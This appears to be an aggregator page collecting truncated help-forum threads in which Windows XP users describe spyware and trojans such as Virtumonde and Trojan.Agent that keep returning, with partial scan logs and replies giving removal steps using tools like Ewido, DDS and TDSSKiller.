C:\WINDOWS\Explorer... Read more

Answer:Spyware keeps coming back

14 more replies
Relevance 48.79%

Hi, I have completed steps 1 thru 6 of READ & RUN ME FIRST several times, but no luck so far. Virtumondo keeps coming back.

1) In normal mode, only MS Antispyware caught it.
2) Switched to safe mode with networking support:
- Ad Aware caught it and confirmed deletion.
- MS Antispyware caught it again and confirmed deletion.
3) Rebooted again to normal mode and Virtumondo is back.
4) Repeated 1 - 6 in safe mode again, but Virtumondo is back again.

This awvvt.dll file keeps coming up as a malware by MS Antispyware, but I'm afraid to delete it manually without some expert guidance.

Can you please help? I have only been able to retrieve the MS Antispyware log, which is listed first below and followed by the HJT log.

Thanks in advance for your help!!!


Edit by bjgarrick: Unrequested, Inline HJT & MSAS log removed!

 

Answer:Please help. Virumondo keeps coming back!

Download this trial version of Ewido Security Suite


Install ewido security suite
Launch ewido, there should be an icon on your desktop double-click it.
The program will have a window come up. One of the buttons on the left is to Update. Click the Update button.and then Start the Update. The update will start and a progress bar will show the updates being installed.
After it completes the update, click the Scanner button

Now exit Ewido. Now print the below instructions or save them locally because I want you do have no browsers opened and also have no connection to the internet (unplug your cable) while doing the below.

Okay, reboot into safe mode and follow the steps below. (If you have any problems at all trying to get into safe mode to complete these steps, just run them in normal boot mode and make sure you tell me when you come back.)

Open up Ewido and do the following:


Click on Scanner
Then click Settings
Under What to Scan? Select Scan every file
Then click OK
Click on Complete System Scan and the scan will start.
Let the program scan the machine
While the scan is in progress you will be prompted to clean files that are infected. Leave the defaults selections (to Remove and backup) and click OK. To save yourself some time, you can select Perform action with all infections and then click OK. With the option to scan every file, a lot of cookies will be removed.

Once the scan has completed, there will be a button located on the bot... Read more

8 more replies
Relevance 48.79%

I've been working on a user's laptop (Win XP SP3) that wouldn't boot, even into safe mode. I ran a windows repair from a Win SP SP3 installation CD, which allowed me to at least get into safe mode. There I found several trojans and viruses, including (these are Symantec names) Trojan.FakeAV!gen29, W32.Harakit, Trojan.Gen, Trojan.FakeAV. After cleaning, Malwarebytes found registry entries for Hijack.FolderOptions and Trojan.Agent. Finally satisfied that the system was clean, I restored the drivers and downloaded and installed all the Windows updates. Both processes required several reboots. I then returned the laptop to the user. Unfortunately, I made the mistake of not running final scans of the system first. But there had been no symptoms during the system restoration, so I was lulled into what was obviously a false sense of security.

Immediately after booting the system the next day, he got an alert from Symantec AV about two infected files: DWH9F.tmp and DWH1E.tmp, both in his profile's Local Settings\Temp folder. They were identified only as "Trojans" - no specifics. He was not yet connected to the internet and had no external devices attached. Laptop back to me. Malwarebytes found two infected registry items: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost (Trojan.Agent) and HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\load (Trojan.Agent).

I'm conc... Read more

Answer:Trojan(s?) Keep Coming Back

Hello and welcome to Bleeping Computer We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here. If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far. Upon completing the steps below another staff member will review your topic an do their best to resolve your issues. If you have already posted a DDS log, please do so again, as your situation may have changed. Use the 'Add Reply' and add the new log to this thread. Thanks and again sorry for the delay. We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scr DDS.pifDouble click on the DDS icon, allow it to run. A small box will open, with an explaination about the tool. No input is needed, the scan is running. Notepad will open with the results. Follow the instructions that... Read more

2 more replies
Relevance 48.79%

On my win XP desktop I found couple of viruses 1-trojan metajuan and 2 trojan virtumonde, while scanned with Norton antivirus.
NAV removed the virus not once twice but more than 4 times and keep coming back even after disabling the system restore.

I also used PC tools spyware doctor and scan the computer several times the same same viruses keep coming back.
Any help will be very much appreciated.
Please help me remove this viruses from computer.
Thank you.

Answer:Virtumonde Keeps Coming Back

You need to post in the correct forum. I'll move you there

9 more replies
Relevance 48.79%

I had this fake Antivirus Scan telling me that my computer was full of virus's. I ran Avast Antivirus and got rid of some stuff and ran Malwarebytes and got rid of alot more.

Problem came back within a few days. Did the same thing this week and the computer seems to be running ok for awhile and then more attacks.

Now I am even getting a "Generic Host Process for Win32 Services has encountered a problem error" every time I start up the computer and the error pops up throughout the session.

Below are the log files that were requested. I had to do the log programs in Safe Mode as the computer is much more stable in Safe Mode and my Firewall will not turn on in regular mode.

DDS (Ver_10-12-12.02) - NTFSx86 NETWORK
Run by Administrator at 14:57:31.00 on Sun 01/30/2011
Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 1.6.0_15
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.478.84 [GMT -6:00]

AV: avast! Antivirus *Enabled/Updated* {7591DB91-41F0-48A3-B128-1A293FD8233D}
AV: McAfee VirusScan *Enabled/Updated* {84B5EE75-6421-4CDE-A33A-DD43BA9FAD83}
FW: McAfee Personal Firewall *Disabled*

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\system32\svchost.exe -k netsvcs
svchost.exe
svchost.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.ex... Read more

Answer:Seem to be infected with something that keeps coming back

Hello jeffw11, Welcome to Bleeping Computer.
My name is fireman4it and I will be helping you with your Malware problem.

Please take note of some guidelines for this fix:
Refrain from making any changes to your computer including installing/uninstall programs, deleting files, modifying the registry, and running scanners or tools.
If you do not understand any step(s) provided, please do not hesitate to ask before continuing.
Even if things appear to be better, it might not mean we are finished. Please continue to follow my instructions and reply back until I give you the "all clean".
Finally, please reply using the button in the lower right hand corner of your screen. Do not start a new topic. The logs that you post should be pasted directly into the reply, unless they do not fit into the post.1.Please download the TDSS Rootkit Removing Tool (TDSSKiller.exe) and save it to your Desktop. <-Important!!!Be sure to download TDSSKiller.exe (v2.4.0.0) from Kaspersky's website and not TDSSKiller.zip which appears to be an older version 2.3.2.2 of the tool.Double-click on TDSSKiller.exe to run the tool for known TDSS variants.
Vista/Windows 7 users right-click and select Run As Administrator.If TDSSKiller does not run, try renaming it. To do this, right-click on TDSSKiller.exe, select Rename and give it a random name with the .com file extension (i.e. 123abc.com). If you do not see the file extension, please refer to How to change the... Read more

12 more replies
Relevance 48.79%

Hi,

I have tried to remove Exactsearch from my PC, but everytime I scan with Panda it says my memory is infected with it again.

My Hijack this log is:

Logfile of HijackThis v1.99.1
Scan saved at 12:21:17 PM, on 26/04/2005
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\SYSTEM32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Panda Software\Panda Titanium Antivirus 2005\PavProt.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\brsvc01a.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\System32\brss01a.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\Program Files\Panda Software\Panda Titanium Antivirus 2005\Firewall\PavFires.exe
C:\Program Files\Panda Software\Panda Titanium Antivirus 2005\PavFnSvr.exe
C:\Program Files\Panda Software\Panda Titanium Antivirus 2005\Pavkre.exe
C:\Program Files\Common Files\Panda Software\PavShld\pavprsrv.exe
C:\Program Files\Panda Software\Panda Titanium Antivirus 2005\pavsrv51.exe
C:\Program Files\Panda Software\Panda Titanium Antivirus 2005\prevsrv.exe
C:\Program Files\Panda Software\Panda Titanium Antivirus 2005\PsImSvc.exe
C:\Program Files\Panda Software\Panda Titanium Antivirus 2005\AVENGINE.EXE
C:\WINDOWS\Expl... Read more

Answer:Exactsearch keeps coming back

hi, Can you post the exact location of the Exactsearch item Panda says it found please?

Look in the program Results or Report from a scan where it was found and post where the item supposedly is.

One thing to try is to find the quarantine or items that were removed by Microsoft Antispyware, AdAware, Spybot or other program and delete those backed up items> Panda or another scanner may detect those.
 

3 more replies